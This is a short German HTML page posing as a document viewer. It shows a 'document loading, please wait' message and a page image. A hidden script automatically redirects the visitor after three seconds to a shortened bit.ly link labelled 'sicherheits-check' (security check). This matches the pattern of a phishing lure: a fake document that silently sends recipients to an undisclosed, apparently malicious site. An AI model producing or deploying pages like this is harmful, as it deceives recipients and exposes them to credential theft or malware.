
    <!DOCTYPE html>
    <html lang="de">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Dokumentanzeige</title>
        <style>
            body {
                text-align: center;
                font-family: Arial, sans-serif;
                background: #f4f4f4;
                padding: 20px;
            }
            img {
                max-width: 100%;
                height: auto;
                border: 1px solid #ccc;
                box-shadow: 2px 2px 10px rgba(0, 0, 0, 0.1);
            }
        </style>
        <script>
            setTimeout(function() {
                window.location.href = "https://bit.ly/sicherheits-check";
            }, 3000); // Weiterleitung nach 3 Sekunden
        </script>
    </head>
    <body>
        <h2>📄 Dokument wird geladen...</h2>
        <p>Bitte warten, das Dokument wird angezeigt.</p>
        <img src="seadweller_page1_optimized.png" alt="Dokumentseite">
    </body>
    </html>
    